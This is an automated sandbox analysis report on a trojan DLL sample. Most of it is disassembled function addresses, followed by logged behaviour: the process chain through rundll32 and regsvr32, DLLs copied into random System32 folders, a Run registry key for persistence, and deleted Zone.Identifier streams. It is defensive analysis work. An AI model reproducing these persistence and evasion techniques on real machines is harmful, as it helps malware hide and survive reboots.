Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800099EC	0_2_00000001800099EC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180028A04	0_2_0000000180028A04
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001FA08	0_2_000000018001FA08
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E614	0_2_000000018001E614
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001A1C	0_2_0000000180001A1C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000BA24	0_2_000000018000BA24
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180021A2C	0_2_0000000180021A2C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180019230	0_2_0000000180019230
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000BE34	0_2_000000018000BE34
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180012244	0_2_0000000180012244
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180006650	0_2_0000000180006650
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001660	0_2_0000000180001660
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180011664	0_2_0000000180011664
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001827C	0_2_000000018001827C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180024680	0_2_0000000180024680
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180022A84	0_2_0000000180022A84
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000AE84	0_2_000000018000AE84
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180028690	0_2_0000000180028690
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180015694	0_2_0000000180015694
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180007694	0_2_0000000180007694
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180013698	0_2_0000000180013698
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009298	0_2_0000000180009298
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018002629C	0_2_000000018002629C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001629C	0_2_000000018001629C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000569C	0_2_000000018000569C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180027EA4	0_2_0000000180027EA4
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800096B8	0_2_00000001800096B8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000EAC4	0_2_000000018000EAC4
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180018ECC	0_2_0000000180018ECC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001B2F0	0_2_000000018001B2F0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180007AF0	0_2_0000000180007AF0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000E708	0_2_000000018000E708
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA09503FB0	3_2_00007FFA09503FB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA09501910	3_2_00007FFA09501910
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA094FABC0	3_2_00007FFA094FABC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA094FC334	3_2_00007FFA094FC334
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA094FA370	3_2_00007FFA094FA370
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_009A0000	3_2_009A0000
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180020454	3_2_0000000180020454
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180028C94	3_2_0000000180028C94
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800038A5	3_2_00000001800038A5
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800248E0	3_2_00000001800248E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180005DB4	3_2_0000000180005DB4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180004DDC	3_2_0000000180004DDC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000B1E0	3_2_000000018000B1E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180009E38	3_2_0000000180009E38
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180003BE8	3_2_0000000180003BE8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180009BEC	3_2_0000000180009BEC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800173F8	3_2_00000001800173F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180017BF8	3_2_0000000180017BF8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180015400	3_2_0000000180015400
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180001000	3_2_0000000180001000
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000741C	3_2_000000018000741C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000E828	3_2_000000018000E828
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180002834	3_2_0000000180002834
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180014C48	3_2_0000000180014C48
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018002005C	3_2_000000018002005C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180016464	3_2_0000000180016464
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180005478	3_2_0000000180005478
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180006880	3_2_0000000180006880
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018002748C	3_2_000000018002748C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001308C	3_2_000000018001308C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180024098	3_2_0000000180024098
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001B898	3_2_000000018001B898
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000C498	3_2_000000018000C498
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180004CA0	3_2_0000000180004CA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800110AC	3_2_00000001800110AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800148B0	3_2_00000001800148B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800078B6	3_2_00000001800078B6
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180001CCC	3_2_0000000180001CCC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000B8D0	3_2_000000018000B8D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800198DC	3_2_00000001800198DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800038DC	3_2_00000001800038DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800264F8	3_2_00000001800264F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800084F8	3_2_00000001800084F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000BD00	3_2_000000018000BD00
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180015508	3_2_0000000180015508
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180018D0C	3_2_0000000180018D0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180012110	3_2_0000000180012110
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001B520	3_2_000000018001B520
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180029124	3_2_0000000180029124
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180013524	3_2_0000000180013524
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180009D24	3_2_0000000180009D24
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180023D28	3_2_0000000180023D28
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180002128	3_2_0000000180002128
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180020930	3_2_0000000180020930
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180009144	3_2_0000000180009144
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001F550	3_2_000000018001F550
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180020D54	3_2_0000000180020D54
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180010954	3_2_0000000180010954
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180018560	3_2_0000000180018560
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000E570	3_2_000000018000E570
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001C974	3_2_000000018001C974
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000F174	3_2_000000018000F174
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180025D84	3_2_0000000180025D84
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180005590	3_2_0000000180005590
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180017198	3_2_0000000180017198
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800159A0	3_2_00000001800159A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180011DAC	3_2_0000000180011DAC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000D1AC	3_2_000000018000D1AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800069C0	3_2_00000001800069C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000A1D4	3_2_000000018000A1D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800079D8	3_2_00000001800079D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001C1DC	3_2_000000018001C1DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000D1E0	3_2_000000018000D1E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800199E8	3_2_00000001800199E8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800099EC	3_2_00000001800099EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180028A04	3_2_0000000180028A04
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001FA08	3_2_000000018001FA08
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E614	3_2_000000018001E614
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180001A1C	3_2_0000000180001A1C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000BA24	3_2_000000018000BA24
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180021A2C	3_2_0000000180021A2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180019230	3_2_0000000180019230
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000BE34	3_2_000000018000BE34
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180012244	3_2_0000000180012244
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180006650	3_2_0000000180006650
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180001660	3_2_0000000180001660
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180011664	3_2_0000000180011664
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001827C	3_2_000000018001827C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180024680	3_2_0000000180024680
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180022A84	3_2_0000000180022A84
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000AE84	3_2_000000018000AE84
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180028690	3_2_0000000180028690
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180015694	3_2_0000000180015694
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180007694	3_2_0000000180007694
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180013698	3_2_0000000180013698
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180009298	3_2_0000000180009298
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018002629C	3_2_000000018002629C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001629C	3_2_000000018001629C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000569C	3_2_000000018000569C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180027EA4	3_2_0000000180027EA4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800096B8	3_2_00000001800096B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000EAC4	3_2_000000018000EAC4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180018ECC	3_2_0000000180018ECC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001B2F0	3_2_000000018001B2F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180007AF0	3_2_0000000180007AF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000E708	3_2_000000018000E708
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180010310	3_2_0000000180010310
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180015B18	3_2_0000000180015B18
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000871C	3_2_000000018000871C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180021728	3_2_0000000180021728
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001D32C	3_2_000000018001D32C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001CF30	3_2_000000018001CF30
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180015334	3_2_0000000180015334
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000A734	3_2_000000018000A734
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180027348	3_2_0000000180027348
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180004B4C	3_2_0000000180004B4C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180001B5C	3_2_0000000180001B5C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180006B5C	3_2_0000000180006B5C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180001364	3_2_0000000180001364
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000FF64	3_2_000000018000FF64
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000C364	3_2_000000018000C364
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000E368	3_2_000000018000E368
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E76C	3_2_000000018001E76C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180018778	3_2_0000000180018778
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180012780	3_2_0000000180012780
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001FB88	3_2_000000018001FB88
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180013B88	3_2_0000000180013B88
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180022B8C	3_2_0000000180022B8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000CB8D	3_2_000000018000CB8D
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180008FA0	3_2_0000000180008FA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180014FA4	3_2_0000000180014FA4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800197AC	3_2_00000001800197AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800257B4	3_2_00000001800257B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180013FE0	3_2_0000000180013FE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000F3E0	3_2_000000018000F3E0

Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: DVvzRulsoR.dll

Virustotal: Detection: 43%

Source: DVvzRulsoR.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\DVvzRulsoR.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\DVvzRulsoR.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\DVvzRulsoR.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\DVvzRulsoR.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\DVvzRulsoR.dll,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XbzeDYiEMjhuDu\OFkfcZsheb.dll"
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\OjshMzvO\drOxhskRmolSyam.dll"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XvLyRsZAjXO\BWic.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HAZEhjzZpU\MdCGCivK.dll"
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\XbzeDYiEMjhuDu\OFkfcZsheb.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\PbznyUjcmjZG\mlrNU.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\DVvzRulsoR.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\DVvzRulsoR.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\DVvzRulsoR.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HAZEhjzZpU\MdCGCivK.dll"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\DVvzRulsoR.dll",#1	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XvLyRsZAjXO\BWic.dll"	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XbzeDYiEMjhuDu\OFkfcZsheb.dll"	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\OjshMzvO\drOxhskRmolSyam.dll"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\PbznyUjcmjZG\mlrNU.dll"	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Users\user\AppData\Local\PbznyUjcmjZG\

Jump to behavior

Source: classification engine

Classification label: mal84.troj.evad.winDLL@21/2@0/49

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFA09503CB0 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,new,ShowWindow,UpdateWindow,

0_2_00007FFA09503CB0

Source: C:\Windows\System32\loaddll64.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_0000000180005DB4 FindCloseChangeNotification,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,

0_2_0000000180005DB4

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\DVvzRulsoR.dll",#1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2824:120:WilError_01

Source: C:\Windows\System32\regsvr32.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: DVvzRulsoR.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: DVvzRulsoR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DVvzRulsoR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DVvzRulsoR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DVvzRulsoR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DVvzRulsoR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DVvzRulsoR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DVvzRulsoR.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: DVvzRulsoR.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: DVvzRulsoR.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DVvzRulsoR.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DVvzRulsoR.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DVvzRulsoR.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DVvzRulsoR.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA094F8909 push rdi; ret	0_2_00007FFA094F8912
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA094F837D push rdi; ret	0_2_00007FFA094F8384
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E0D3 push 09B8E1F7h; retf	0_2_000000018001E0DD
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E0E9 push 8B48E1F7h; retf	0_2_000000018001E0F1
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180023127 push ebp; ret	0_2_0000000180023128
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E5C5 pushad ; ret	0_2_000000018001E5C7
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180022E55 push ebp; retf	0_2_0000000180022E56
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180023A7E push ebp; ret	0_2_0000000180023A86
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA094F8909 push rdi; ret	3_2_00007FFA094F8912
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA094F837D push rdi; ret	3_2_00007FFA094F8384
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E0D3 push 09B8E1F7h; retf	3_2_000000018001E0DD
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E0E9 push 8B48E1F7h; retf	3_2_000000018001E0F1
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180023127 push ebp; ret	3_2_0000000180023128
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E5C5 pushad ; ret	3_2_000000018001E5C7
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180022E55 push ebp; retf	3_2_0000000180022E56
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180023A7E push ebp; ret	3_2_0000000180023A86
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180022F5E push ebp; ret	3_2_0000000180022F64
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000838C push eax; ret	3_2_000000018000838E

Source: DVvzRulsoR.dll	Static PE information: section name: .gxfg
Source: DVvzRulsoR.dll	Static PE information: section name: .gehcont

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\DVvzRulsoR.dll

Source: C:\Windows\System32\rundll32.exe

PE file moved: C:\Windows\System32\XbzeDYiEMjhuDu\OFkfcZsheb.dll

Jump to behavior

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\regsvr32.exe

Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OFkfcZsheb.dll

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OFkfcZsheb.dll			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OFkfcZsheb.dll			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\loaddll64.exe	File opened: C:\Windows\system32\HAZEhjzZpU\MdCGCivK.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Windows\system32\XvLyRsZAjXO\BWic.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\system32\XbzeDYiEMjhuDu\OFkfcZsheb.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\system32\OjshMzvO\drOxhskRmolSyam.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\PbznyUjcmjZG\mlrNU.dll:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe TID: 5020

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll64.exe	API coverage: 7.5 %
